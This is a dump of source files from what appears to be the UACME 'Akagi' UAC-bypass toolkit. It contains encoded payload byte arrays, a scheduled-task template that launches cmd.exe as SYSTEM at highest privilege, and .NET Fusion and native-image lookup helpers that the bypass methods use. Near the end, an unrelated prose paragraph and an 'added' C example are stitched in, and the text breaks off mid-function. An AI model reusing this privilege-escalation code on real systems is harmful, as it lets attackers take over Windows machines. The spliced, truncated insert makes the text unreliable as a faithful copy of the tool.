0xE0, 0x93, 0x2A, 0xAE, 0x05, 0x43, 0xA9, 0xC5, 0x88, 0xF4, 0x36, 0xED, 0x49, 0x1F, 0x99, 0xC7, 0x90, 0xC8, 0x23, 0xF2, 0x58, 0x19, 0x80, 0x80, 0xBC, 0xC9, 0x3C, 0xB0, 0x7A, 0x1F, 0x9A, 0x8C, 0xA1, 0xCE, 0x2C, 0xB0, 0x74, 0x3F, 0x9A, 0x9C, 0xBE, 0xC2, 0x3D, 0xFF, 0x5F, 0x16, 0x91, 0x89, 0xE2, 0xFC, 0x14, 0xCD, 0x44, 0x09, 0x80, 0x8C, 0xBE, 0x89, 0x1B, 0xE7, 0x4D, 0x1F, 0xD8, 0xC9, 0xBE, 0xD4, 0x2C, 0xF1, 0x4F, 0x16, 0x9D, 0x8B, 0xFF, 0x87, 0x19, 0xFB, 0x4F, 0x09, 
};

/*
 * g_encodedTaskParamBegin/g_encodedTaskParamEnd Reference = L"\ \ \ Test Task\ \ \ \ \ SYSTEM\ HighestAvailable\ \ \ \ IgnoreNew\ true\ true\ true\ false\ false\ \ PT10M\ PT1H\ true\ false\ \ true\ true\ false\ false\ false\ false\ PT72H\ 7\ \ \ \ cmd.exe\ \ \ ";
 * g_encodedTaskParamBegin = L"\ \ \ Test Task\ \ \ \ \ SYSTEM\ HighestAvailable\ \ \ \ IgnoreNew\ true\ true\ true\ false\ false\ \ PT10M\ PT1H\ true\ false\ \ true\ true\ false\ false\ false\ false\ PT72H\ 7\ \ \ \ ";
 * g_encodedTaskParamEnd = L"\ \ \ ";
 */

static const unsigned char g_encodedTaskParamBegin[2308] = {
};

static const unsigned char g_encodedTaskParamEnd[69] = {
};

static const unsigned char g_webviewvsinfo[1224]
= {
0xE6, 0x8B, 0x9B, 0x5E, 0x6E, 0xB0, 0xB9, 0x16, 0xE6, 0xA3, 0x9B, 0x56, 0x6E, 0xB1, 0xB8, 0x14, 0xE2, 0xC5, 0x8B, 0x53, 0x2C, 0x35, 0xB0, 0x03, 0xC2, 0xE0, 0x0B, 0x73, 0x2E, 0x38, 0xB9, 0x16, 0xE6, 0xA9, 0x9B, 0x75, 0x6E, 0xAE, 0xB9, 0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0x92, 0x8B, 0x73, 0x2C, 0x3A, 0xB0, 0x37, 0xC2, 0xEC, 0x0B, 0x72, 0x2E, 0x2B, 0xB9, 0x5D, 0xE6, 0xA9, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0xB7, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0, 0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x3D, 0xE6, 0xAC, 0x9B, 0x5A, 0x6E, 0xB9, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB8, 0x12, 0xE2, 0xB7, 0x8B, 0x79, 0x2C, 0x2B, 0xB0, 0x0E, 0xC2, 0xE3, 0x0B, 0x63, 0x2E, 0x7C, 0xB9, 0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB9, 0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x72, 0x2C, 0x3D, 0xB0, 0x05, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x2E, 0xB9, 0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB9, 0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB8, 0x13, 0xE2, 0x93, 0x8B, 0x7F, 0x2C, 0x3D, 0xB0, 0x16, 0xC2, 0xA5, 0x0B, 0x54, 0x2E, 0x30, 0xB9, 0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x03, 0x6E, 0xCC, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0, 0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x25, 0xE6, 0xA8, 0x9B, 0x45, 0x6E, 0xAF, 0xB9, 0x1A, 0xE6, 0xA2, 0x9B, 0x59, 0x6E, 0xDC, 0xB8, 0x40, 0xE2, 0xEB, 0x8B, 0x26, 0x2C, 0x76, 0xB0, 0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x4F, 0xE6, 0xD9, 0x9B, 0x36, 0x6E, 0x9F, 0xB9, 0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x45, 0x2C, 0x30, 0xB0, 0x0E, 0xC2, 0xF7, 0x0B, 0x63, 0x2E, 0x12, 0xB9, 0x12, 0xE6, 0xA0, 0x9B, 0x52, 0x6E, 0xDC, 0xB9, 0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB8, 0x1E, 0xE2, 0xB6, 0x8B, 0x79, 0x2C, 0x3E, 0xB0, 0x15, 0xC2, 0x85, 0x0B, 0x9F, 0x2E, 0x02, 0xB9, 0x72, 0xE6, 0x9D, 0x9B, 0x45, 0x6E, 0xB3, 0xB9, 0x17, 0xE6, 0xB8, 0x9B, 0x54, 0x6E, 
0xA8, 0xB8, 0x22, 0xE2, 0xAD, 0x8B, 0x79, 0x2C, 0x2A, 0xB0, 0x15, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB9, 0x10, 0xE6, 0xBF, 0x9B, 0x58, 0x6E, 0xAF, 0xB8, 0x1E, 0xE2, 0xA3, 0x8B, 0x62, 0x2C, 0x78, 0xB0, 0x24, 0xC2, 0xE1, 0x0B, 0x70, 0x2E, 0x39, 0xB9, 0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB9, 0x16, 0xE6, 0xA9, 0x9B, 0x53, 0x6E, 0xB9, 0xB8, 0x15, 0xE2, 0xE5, 0x8B, 0x54, 0x2C, 0x2A, 0xB0, 0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB9, 0x11, 0xE6, 0x9B, 0x9B, 0x5E, 0x6E, 0xB9, 0xB8, 0x06, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x34, 0xB0, 0x08, 0xC2, 0xE0, 0x0B, 0x79, 0x2E, 0x28, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6E, 0xD8, 0xB9, 0x72, 0xE6, 0x82, 0x9B, 0x51, 0x6E, 0xBA, 0xB8, 0x18, 0xE2, 0xA6, 0x8B, 0x7F, 0x2C, 0x39, 0xB0, 0x0D, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x29, 0xB9, 0x1A, 0xE6, 0xA1, 0x9B, 0x53, 0x6E, 0xDC, 0xB9, 0x42, 0xE6, 0xCD, 0x9B, 0x73, 0x6E, 0xDC, 0xB8, 0x71, 0xE2, 0x93, 0x8B, 0x77, 0x2C, 0x2A, 0xB0, 0x27, 0xC2, 0xEC, 0x0B, 0x7B, 0x2E, 0x39, 0xB9, 0x3A, 0xE6, 0xA3, 0x9B, 0x51, 0x6E, 0xB3, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x13, 0x6E, 0xD8, 0xB8, 0x71, 0xE2, 0x91, 0x8B, 0x64, 0x2C, 0x39, 0xB0, 0x0F, 0xC2, 0xF6, 0x0B, 0x7B, 0x2E, 0x3D, 0xB9, 0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x3E, 0x6A, 0x6C, 0xBC }; ================================================ FILE: Source/Akagi/fusutil.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2020 - 2026 * * TITLE: FUSUTIL.C * * VERSION: 3.69 * * DATE: 12 Feb 2026 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
 *
 *******************************************************************************/

#include "global.h"

/*
* fusUtilInitFusion
*
* Purpose:
*
* Load .NET Assembly Manager dll and remember function pointers.
*
*/
BOOLEAN fusUtilInitFusion(
    _In_ DWORD dwVersion
)
{
    HMODULE hFusion;
    LPCWSTR lpFusionDir;
    pfnCreateAssemblyCache CreateAssemblyCache;
    pfnCreateAssemblyEnum CreateAssemblyEnum;
    WCHAR szBuffer[MAX_PATH * 2];

    if (g_ctx->FusionContext.Initialized)
        return TRUE;

    if (dwVersion != 2 && dwVersion != 4)
        return FALSE;

    //
    // Build path to assembly manager dll
    //
    _strcpy(szBuffer, g_ctx->szSystemRoot);
    _strcat(szBuffer, MSNETFRAMEWORK_DIR);
#ifdef _WIN64
    _strcat(szBuffer, TEXT("64"));
#endif
    if (dwVersion == 2)
        lpFusionDir = NET2_DIR;
    else
        lpFusionDir = NET4_DIR;

    supConcatenatePaths(szBuffer, lpFusionDir, ARRAYSIZE(szBuffer));
    supConcatenatePaths(szBuffer, TEXT("fusion.dll"), ARRAYSIZE(szBuffer));

    hFusion = LoadLibraryEx(szBuffer, NULL, 0);
    if (hFusion == NULL)
        return FALSE;

    CreateAssemblyCache = (pfnCreateAssemblyCache)GetProcAddress(hFusion, "CreateAssemblyCache");
    CreateAssemblyEnum = (pfnCreateAssemblyEnum)GetProcAddress(hFusion, "CreateAssemblyEnum");

    if (CreateAssemblyCache == NULL || CreateAssemblyEnum == NULL) {
        FreeLibrary(hFusion);
        return FALSE;
    }

    g_ctx->FusionContext.hFusion = hFusion;
    g_ctx->FusionContext.CreateAssemblyCache = CreateAssemblyCache;
    g_ctx->FusionContext.CreateAssemblyEnum = CreateAssemblyEnum;
    g_ctx->FusionContext.Initialized = TRUE;

    return TRUE;
}

/*
* fusUtilBinToUnicodeHex
*
* Purpose:
*
* Bin to Hex special edition.
*
*/
VOID fusUtilBinToUnicodeHex(
    _In_ const BYTE* pSrc,
    _In_ UINT cSrc,
    _Out_cap_(2 * cSrc + 1) LPWSTR pDst)
{
    UINT x;
    UINT y;

#define TOHEX(a) (WCHAR)((a)>=10 ? L'a'+(a)-10 : L'0'+(a))

    for (x = 0, y = 0; x < cSrc; ++x) {
        UINT v;
        v = pSrc[x] >> 4;
        pDst[y++] = TOHEX(v);
        v = pSrc[x] & 0x0f;
        pDst[y++] = TOHEX(v);
    }
    pDst[y] = L'\0';
}

/*
* fusUtilGetAssemblyName
*
* Purpose:
*
* Return assembly name.
*
* Note: Use supHeapFree to release lpAssemblyName allocated memory.
*
*/
HRESULT fusUtilGetAssemblyName(
    _In_ IAssemblyName* pInterface,
    _Inout_ LPWSTR* lpName,
    _Out_opt_ PSIZE_T pcchName,
    _Inout_opt_ LPWSTR* lpDisplayName,
    _Out_opt_ PSIZE_T pcchDisplayName
)
{
    DWORD cchName = 0;
    HRESULT hr;
    LPWSTR assemblyName = NULL, displayName = NULL;

    do {
        if (pcchName)
            *pcchName = 0;
        if (pcchDisplayName)
            *pcchDisplayName = 0;

        hr = pInterface->lpVtbl->GetName(pInterface, &cchName, NULL);
        if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
            break;

        assemblyName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));
        if (assemblyName)
            hr = pInterface->lpVtbl->GetName(pInterface, &cchName, (LPOLESTR)assemblyName);
        else
            hr = E_OUTOFMEMORY;

        if (pcchName) {
            if (SUCCEEDED(hr))
                *pcchName = cchName;
        }

        cchName = 0;
        hr = pInterface->lpVtbl->GetDisplayName(pInterface, NULL, &cchName, 0);
        if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
            break;

        displayName = (LPWSTR)supHeapAlloc((cchName * sizeof(WCHAR)) + sizeof(UNICODE_NULL));
        if (displayName)
            hr = pInterface->lpVtbl->GetDisplayName(pInterface, (LPOLESTR)displayName, &cchName, 0);
        else
            hr = E_OUTOFMEMORY;

        if (pcchDisplayName) {
            if (SUCCEEDED(hr))
                *pcchDisplayName = cchName;
        }

    } while (FALSE);

    *lpName = assemblyName;
    if (lpDisplayName)
        *lpDisplayName = displayName;
    else if (displayName)
        supHeapFree(displayName); // caller did not ask for the display name, do not leak it

    return hr;
}

/*
* fusUtilGetAssemblyMVIDFromZapCache
*
* Purpose:
*
* Query cache zap assembly mvid.
*
*/
BOOL fusUtilGetAssemblyMVIDFromZapCache(
    _In_ LPCWSTR AssemblyName,
    _Inout_ GUID* ModuleVersionId
)
{
    BOOL bFound = FALSE, bResult = FALSE;
    HRESULT hr;
    IAssemblyEnum* asmEnum = NULL;
    IAssemblyName* asmName = NULL;
    LPWSTR lpAssemblyName = NULL;
    DWORD dwSize;

    do {
        hr = g_ctx->FusionContext.CreateAssemblyEnum(&asmEnum, NULL, NULL, ASM_CACHE_ZAP, NULL);
        if ((FAILED(hr)) || (asmEnum == NULL))
            break;

        //
        // Locate assembly and remember it name/display name.
        //
        while ((hr = asmEnum->lpVtbl->GetNextAssembly(asmEnum, NULL, &asmName, 0)) == S_OK) {

            if (SUCCEEDED(fusUtilGetAssemblyName(asmName, &lpAssemblyName, NULL, NULL, NULL)) &&
                _strcmpi(AssemblyName, lpAssemblyName) == 0)
            {
                bFound = TRUE;
                break;
            }

            // Name buffer may also be returned on failure, release it before the next iteration.
            if (lpAssemblyName) {
                supHeapFree(lpAssemblyName);
                lpAssemblyName = NULL;
            }

            asmName->lpVtbl->Finalize(asmName);
            asmName->lpVtbl->Release(asmName);
            asmName = NULL; // prevent a second Release below if enumeration ends here
        }

        if (FAILED(hr) || bFound == FALSE)
            break;

        dwSize = 0;
        hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, NULL, &dwSize);
        if (hr != HRESULT_FROM_WIN32(ERROR_INSUFFICIENT_BUFFER))
            break;

        if (dwSize != sizeof(GUID))
            break;

        hr = asmName->lpVtbl->GetProperty(asmName, ASM_NAME_MVID, ModuleVersionId, &dwSize);
        bResult = SUCCEEDED(hr);

    } while (FALSE);

    if (asmName) {
        asmName->lpVtbl->Finalize(asmName);
        asmName->lpVtbl->Release(asmName);
    }

    if (asmEnum)
        asmEnum->lpVtbl->Release(asmEnum);

    if (lpAssemblyName)
        supHeapFree(lpAssemblyName);

    return bResult;
}

/*
* fusUtilGetAssemblyPath
*
* Purpose:
*
* Return given assembly file path.
*
* Note: Use supHeapFree to release lpAssemblyPath allocated memory.
*
*/
HRESULT fusUtilGetAssemblyPath(
    _In_ IAssemblyCache* pInterface,
    _In_ LPCWSTR lpAssemblyName,
    _Inout_ LPCWSTR* lpAssemblyPath
)
{
    HRESULT hr = E_FAIL;
    ASSEMBLY_INFO asmInfo;
    LPWSTR assemblyPath;

    *lpAssemblyPath = NULL;

    RtlSecureZeroMemory(&asmInfo, sizeof(asmInfo));
    pInterface->lpVtbl->QueryAssemblyInfo(pInterface, QUERYASMINFO_FLAG_GETSIZE, lpAssemblyName, &asmInfo);
    if (asmInfo.cchBuf == 0) //empty pszCurrentAssemblyPathBuf
        return E_FAIL;

    assemblyPath = (LPWSTR)supHeapAlloc(asmInfo.cchBuf * sizeof(WCHAR));
    if (assemblyPath == NULL)
        return E_FAIL;

    asmInfo.pszCurrentAssemblyPathBuf = assemblyPath;
    hr = pInterface->lpVtbl->QueryAssemblyInfo(pInterface, QUERYASMINFO_FLAG_VALIDATE, lpAssemblyName, &asmInfo);
    if (!SUCCEEDED(hr)) {
        supHeapFree(asmInfo.pszCurrentAssemblyPathBuf);
    }
    else {
        *lpAssemblyPath = assemblyPath;
    }

    return hr;
}

/*
* fusUtilGetAssemblyPathByName
*
* Purpose:
*
* Return given assembly file path.
*
* Note: Use supHeapFree to release lpAssemblyPath allocated memory.
*
*/
BOOLEAN fusUtilGetAssemblyPathByName(
    _In_ LPWSTR lpAssemblyName,
    _Inout_ LPWSTR* lpAssemblyPath
)
{
    HRESULT hr;
    IAssemblyCache* asmCache = NULL;

    do {
        hr = g_ctx->FusionContext.CreateAssemblyCache(&asmCache, 0);
        if ((FAILED(hr)) || (asmCache == NULL))
            break;

        hr = fusUtilGetAssemblyPath(asmCache, lpAssemblyName, (LPCWSTR*)lpAssemblyPath);
        asmCache->lpVtbl->Release(asmCache);

    } while (FALSE);

    return SUCCEEDED(hr);
}

/*
* fusUtilReferenceStreamByName
*
* Purpose:
*
* Query stream pointer by stream name.
*
*/
BOOL fusUtilReferenceStreamByName(
    _In_ STORAGEHEADER* StorageHeader,
    _In_ LPCSTR StreamName,
    _Out_ PSTORAGESTREAM* StreamRef
)
{
    WORD i;
    PBYTE streamPtr;
    STORAGESTREAM* pStorStream;
    ULONG offset;
    SIZE_T nameLen;

    *StreamRef = NULL;

    streamPtr = (PBYTE)RtlOffsetToPointer(StorageHeader, sizeof(STORAGEHEADER));

    i = 0;
    do {
        pStorStream = (STORAGESTREAM*)streamPtr;
        if (IsBadReadPtr(pStorStream->rcName, sizeof(CHAR)))
            return FALSE;

        if (_strcmpi_a(pStorStream->rcName, StreamName) == 0) {
            *StreamRef = pStorStream;
            return TRUE;
        }

        nameLen = _strlen_a(pStorStream->rcName) + 1;
        if (nameLen > MAXUSHORT)
            return FALSE;

        // Stream headers are padded to a 4-byte boundary after the name.
        offset = ALIGN_UP(FIELD_OFFSET(STORAGESTREAM, rcName) + nameLen, ULONG);
        streamPtr = (PBYTE)RtlOffsetToPointer(streamPtr, offset);
        i++;
    } while (i < StorageHeader->iStreams);

    return FALSE;
}

/*
* fusUtilGetImageMVID
*
* Purpose:
*
* Query MVID value from image metadata.
*
* Ref: https://www.ntcore.com/files/dotnetformat.htm
*
*/
BOOL fusUtilGetImageMVID(
    _In_ LPCWSTR lpImageName,
    _Out_ GUID* ModuleVersionId
)
{
    BOOL bResult = FALSE;
    HMODULE hModule;
    PVOID baseAddress;
    IMAGE_COR20_HEADER* cliHeader;
    ULONG sz, offset, mvidIndex, i;
    STORAGESIGNATURE* pStorSign;
    STORAGEHEADER* pStorHeader;
    STORAGESTREAM* pStreamGuid;
    STORAGESTREAM* pStreamTables;
    STORAGETABLESHEADER* pTablesHeader;
    PBYTE tablesPtr;
    LPGUID guidsPtr;
    RPC_STATUS st;

    st = UuidCreateNil(ModuleVersionId);
    if (st != S_OK)
        return FALSE;

    hModule = LoadLibraryEx(lpImageName, NULL, LOAD_LIBRARY_AS_IMAGE_RESOURCE);
    if (hModule) {

        // Resource-mapped modules carry flag bits in the low bits of the handle.
        baseAddress = (PBYTE)(((ULONG_PTR)hModule) & ~3);

        cliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(baseAddress,
            TRUE,
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR,
            &sz);

        if (cliHeader && sz >= sizeof(IMAGE_COR20_HEADER)) {

            pStorSign = (STORAGESIGNATURE*)RtlOffsetToPointer(baseAddress, cliHeader->MetaData.VirtualAddress);
            if (pStorSign &&
                !IsBadReadPtr(pStorSign, sizeof(STORAGESIGNATURE)) &&
                pStorSign->lSignature == STORAGE_MAGIC_SIG)
            {
                offset = FIELD_OFFSET(STORAGESIGNATURE, pVersion) + pStorSign->iVersionString;
                pStorHeader = (STORAGEHEADER*)RtlOffsetToPointer(pStorSign, offset);

                pStreamTables = NULL;
                if (!fusUtilReferenceStreamByName(pStorHeader, "#~", &pStreamTables)) {
                    FreeLibrary(hModule);
                    return FALSE;
                }

                pStreamGuid = NULL;
                if (!fusUtilReferenceStreamByName(pStorHeader, "#GUID", &pStreamGuid)) {
                    FreeLibrary(hModule);
                    return FALSE;
                }

                pTablesHeader = (STORAGETABLESHEADER*)RtlOffsetToPointer(pStorSign, pStreamTables->iOffset);

                sz = 0;

                //
                // __popcnt64 or the garbage code below
                //
                for (i = 0; i < MAX_CLR_TABLES; i++)
                    if ((i < 32 && (pTablesHeader->Valid.u.LowPart >> i) & 1) ||
                        (i >= 32 && (pTablesHeader->Valid.u.HighPart >> (i - 32)) & 1)) // shift is relative to the high dword
                    {
                        sz++;
                    }

                // Skip the Rows[] array (one ULONG per present table) to reach the Module table row.
                offset = FIELD_OFFSET(STORAGETABLESHEADER, Rows) + (sz * sizeof(ULONG));
                tablesPtr = (PBYTE)RtlOffsetToPointer(pTablesHeader, offset);

                // Module row: Generation (WORD), Name (#Strings index), Mvid (#GUID index).
                tablesPtr += sizeof(WORD);

                if (pTablesHeader->HeapOffsetSizes & MD_STRINGS_BIT)
                    tablesPtr += sizeof(DWORD);
                else
                    tablesPtr += sizeof(WORD);

                if (pTablesHeader->HeapOffsetSizes & MD_GUIDS_BIT)
                    mvidIndex = *(PULONG)tablesPtr;
                else
                    mvidIndex = *(PUSHORT)tablesPtr;

                // GUID heap indexes are 1-based; reject an index that points past the #GUID stream.
                if (mvidIndex && ((ULONGLONG)mvidIndex * sizeof(GUID)) <= pStreamGuid->iSize) {
                    guidsPtr = (LPGUID)RtlOffsetToPointer(pStorSign, pStreamGuid->iOffset);
                    RtlCopyMemory(ModuleVersionId, &guidsPtr[mvidIndex - 1], sizeof(GUID));
                    bResult = TRUE;
                }
            }
        }

        FreeLibrary(hModule);
    }

    return bResult;
}

/*
* fusUtilpFusionScanFiles
*
* Purpose:
*
* Scan directory for files of given type.
*
* Note:
* Return TRUE to abort further scan, FALSE otherwise.
*
*/
BOOL fusUtilpFusionScanFiles(
    _In_ LPWSTR lpDirectory,
    _In_ LPWSTR lpExtension,
    _In_ pfnFusionScanFilesCallback pfnCallback,
    _In_opt_ PVOID pvUserContext
)
{
    BOOL bResult = FALSE;
    HANDLE hFile;
    LPWSTR lpLookupDirectory = NULL;
    SIZE_T cchBuffer;
    WIN32_FIND_DATA fdata;

    //
    // Allocate buffer for path to the file including backslash and terminating null.
    //
    cchBuffer = (2 + _strlen(lpDirectory) + _strlen(lpExtension));
    lpLookupDirectory = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
    if (lpLookupDirectory) {

        _strcpy(lpLookupDirectory, lpDirectory);
        supConcatenatePaths(lpLookupDirectory, lpExtension, cchBuffer);

        hFile = FindFirstFile(lpLookupDirectory, &fdata);
        if (hFile != INVALID_HANDLE_VALUE) {
            do {
                if (pfnCallback(lpDirectory, &fdata, pvUserContext)) {
                    bResult = TRUE;
                    break;
                }
            } while (FindNextFile(hFile, &fdata));
            FindClose(hFile);
        }

        supHeapFree(lpLookupDirectory);
    }

    return bResult;
}

/*
* fusUtilScanDirectory
*
* Purpose:
*
* Recursively scan directories looking for files with given extension.
*
*/
BOOL fusUtilScanDirectory(
    _In_ LPWSTR lpDirectory,
    _In_ LPWSTR lpExtension,
    _In_ pfnFusionScanFilesCallback pfnCallback,
    _In_opt_ PVOID pvUserContext
)
{
    BOOL bResult = FALSE;
    SIZE_T cchBuffer;
    HANDLE hDirectory;
    LPWSTR lpFilePath;
    WIN32_FIND_DATA fdata;

    if (fusUtilpFusionScanFiles(lpDirectory, lpExtension, pfnCallback, pvUserContext))
        return TRUE;

    //
    // Allocate buffer for path including backslash, search mask, terminating null and space for filename.
    //
    cchBuffer = 4 + MAX_PATH + _strlen(lpDirectory);
    lpFilePath = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
    if (lpFilePath == NULL)
        return FALSE;

    _strcpy(lpFilePath, lpDirectory);
    supConcatenatePaths(lpFilePath, TEXT("*"), cchBuffer);

    hDirectory = FindFirstFile(lpFilePath, &fdata);
    if (hDirectory != INVALID_HANDLE_VALUE) {
        do {
            if ((fdata.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) &&
                (fdata.cFileName[0] != L'.'))
            {
                _strcpy(lpFilePath, lpDirectory);
                // Recursed directories arrive without a trailing backslash, so let the helper insert the separator.
                supConcatenatePaths(lpFilePath, fdata.cFileName, cchBuffer);
                bResult = fusUtilScanDirectory(lpFilePath, lpExtension, pfnCallback, pvUserContext);
                if (bResult)
                    break;
            }
        } while (FindNextFile(hDirectory, &fdata));
        FindClose(hDirectory);
    }

    supHeapFree(lpFilePath);

    return bResult;
}

/*
* fusUtilFindFileByMVIDCallback
*
* Purpose:
*
* supFusionScanDirectory callback for MVID comparison.
*
*/
BOOL fusUtilFindFileByMVIDCallback(
    _In_ LPWSTR CurrentDirectory,
    _In_ WIN32_FIND_DATA* FindData,
    _In_ PVOID UserContext
)
{
    FUSION_SCAN_PARAM* ScanParam = (FUSION_SCAN_PARAM*)UserContext;
    LPWSTR lpFileName;
    SIZE_T cchBuffer;
    GUID mVid;
    RPC_STATUS rpcStatus;

    cchBuffer = 2 + MAX_PATH + _strlen(CurrentDirectory);
    lpFileName = (LPWSTR)supHeapAlloc(cchBuffer * sizeof(WCHAR));
    if (lpFileName) {

        _strcpy(lpFileName, CurrentDirectory);
        supConcatenatePaths(lpFileName, FindData->cFileName, cchBuffer);

        if (fusUtilGetImageMVID(lpFileName, &mVid)) {
            if (0 == UuidCompare(ScanParam->ReferenceMVID, &mVid, &rpcStatus)) {
                ScanParam->lpFileName = lpFileName;
                return TRUE;
            }
        }

        supHeapFree(lpFileName);
    }

    return FALSE;
}

#define NI_DLL_EXT L".ni.dll"
#define NI_DLL_AUX_EXT L".ni.dll.aux"

/*
* fusUtilCombineNativeImageCacheName
*
* Purpose:
*
* Build cache image name from assembly name.
*
*/
VOID fusUtilCombineNativeImageCacheName(
    _In_ LPCWSTR lpAssemblyName,
    _Inout_ LPWSTR lpNativeImageName,
    _In_ DWORD cchNativeName,
    _In_ BOOLEAN fIsAux
)
{
    supConcatenatePaths(lpNativeImageName, lpAssemblyName, cchNativeName);
    if (fIsAux) {
        _strcat(lpNativeImageName, NI_DLL_AUX_EXT);
    }
    else {
        _strcat(lpNativeImageName, NI_DLL_EXT);
    }
}

================================================
FILE: Source/Akagi/fusutil.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2020 - 2021
*
*  TITLE:       FUSUTIL.H
*
*  VERSION:     3.58
*
*  DATE:        01 Dec 2021
*
*  Common header file for the Windows Fusion support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

//
// Fusion CLI metadata structures
//

typedef struct _STORAGESIGNATURE {
    ULONG lSignature;               // "Magic" signature.
    USHORT iMajorVer;               // Major file version.
    USHORT iMinorVer;               // Minor file version.
    ULONG iExtraData;               // Offset to next structure of information
    ULONG iVersionString;           // Length of version string
    BYTE pVersion[ANYSIZE_ARRAY];   // Version string
} STORAGESIGNATURE, * PSTORAGESIGNATURE;

typedef struct _STORAGEHEADER {
    BYTE fFlags;                    // STGHDR_xxx flags.
    BYTE pad;
    USHORT iStreams;                // How many streams are there.
} STORAGEHEADER, * PSTORAGEHEADER;

#define MAXSTREAMNAME 32

typedef struct _STORAGESTREAM {
    ULONG iOffset;                  // Offset in file for this stream.
    ULONG iSize;                    // Size of the file.
    CHAR rcName[MAXSTREAMNAME];
} STORAGESTREAM, * PSTORAGESTREAM;

#include

typedef struct _STORAGETABLESHEADER {
    DWORD Reserved0;
    BYTE MajorVersion;
    BYTE MinorVersion;
    BYTE HeapOffsetSizes;
    BYTE Reserved1;
    ULARGE_INTEGER Valid;
    ULARGE_INTEGER Sorted;
    ULONG Rows[ANYSIZE_ARRAY];
} STORAGETABLESHEADER, * PSTORAGETABLESHEADER;

#include

#define STORAGE_MAGIC_SIG 0x424A5342 // BSJB

#define MD_STRINGS_BIT 0x1
#define MD_GUIDS_BIT 0x2
#define MD_BLOBS_BIT 0x4

#define MAX_CLR_TABLES 64

//
// Fusion metadata end
//

//
// Assembly cache scan routine and definitions.
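The structures above describe the CLI metadata root that fusUtilGetImageMVID walks (STORAGESIGNATURE, then the stream directory, then the #~ tables stream whose Module row indexes the #GUID heap). The following is an added, stand-alone example and not UACME code: it performs the same walk over a byte buffer instead of a mapped image, but checks every offset against the buffer length before reading, which is the discipline an analyst tool needs when it matches NGEN native images to their assemblies by MVID on untrusted input. The 116-byte metadata root it parses is constructed inline; the function and macro names (cli_get_mvid, cli_find_stream, cli_build_sample, cli_example_roundtrip, CLI_*) are this example's own.

```c
/* Added example, not part of UACME: bounds-checked MVID extraction from a CLI
 * metadata root ("BSJB" blob): #~ stream -> tables header -> Module row -> #GUID
 * heap, with every read validated against len. Names are this example's own. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CLI_MAGIC         0x424A5342u  /* "BSJB" */
#define CLI_STRINGS_BIT   0x1          /* 4-byte #Strings indexes */
#define CLI_GUIDS_BIT     0x2          /* 4-byte #GUID indexes    */
#define CLI_MAXSTREAMNAME 32

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static uint64_t rd64(const uint8_t *p) { return rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

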